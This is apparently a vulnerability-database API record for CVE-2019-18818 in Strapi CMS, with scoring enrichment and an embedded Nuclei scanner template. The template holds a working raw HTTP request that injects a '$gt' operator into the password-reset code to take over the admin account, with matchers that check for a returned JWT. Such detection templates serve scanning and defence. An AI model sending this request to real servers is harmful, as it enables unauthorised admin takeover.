{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-18818/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-18818/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-18818/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-18818/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-18818/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-18818"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-18818"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.97639,
      "kev": false,
      "percentile": 0.999
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-18818.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2019-18818\n\ninfo:\n  name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset\n  author: idealphase\n  severity: critical\n  description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.\n  impact: |\n    An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel.\n  remediation: |\n    Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability.\n  reference:\n    - https://github.com/advisories/GHSA-6xc2-mj39-q599\n    - https://www.exploit-db.com/exploits/50239\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-18818\n    - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5\n    - https://github.com/strapi/strapi/pull/4443\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-18818\n    cwe-id: CWE-640\n    epss-score: 0.97639\n    epss-percentile: 0.99901\n    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: strapi\n    product: strapi\n  tags: cve,cve2019,strapi,auth-bypass,intrusive,edb,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /admin/auth/reset-password HTTP/1.1\n        Host: {{Hostname}}\n        Origin: {{BaseURL}}\n        Content-Type: application/json\n\n        {\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: word\n        part: body\n        words:\n          - '\"username\":'\n          - '\"email\":'\n          - '\"jwt\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: json\n        json:\n          - .user.username\n          - .user.email\n# digest: 4a0a004730450220611ed1a002d57b767c3da7b92c700a5a5f035bc04fc2af252d30bbe0ca98423a022100d09f097649aa66a45e51e084d607a6275218171c703530da1cbb4d2c6743c9b8:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-18818"
}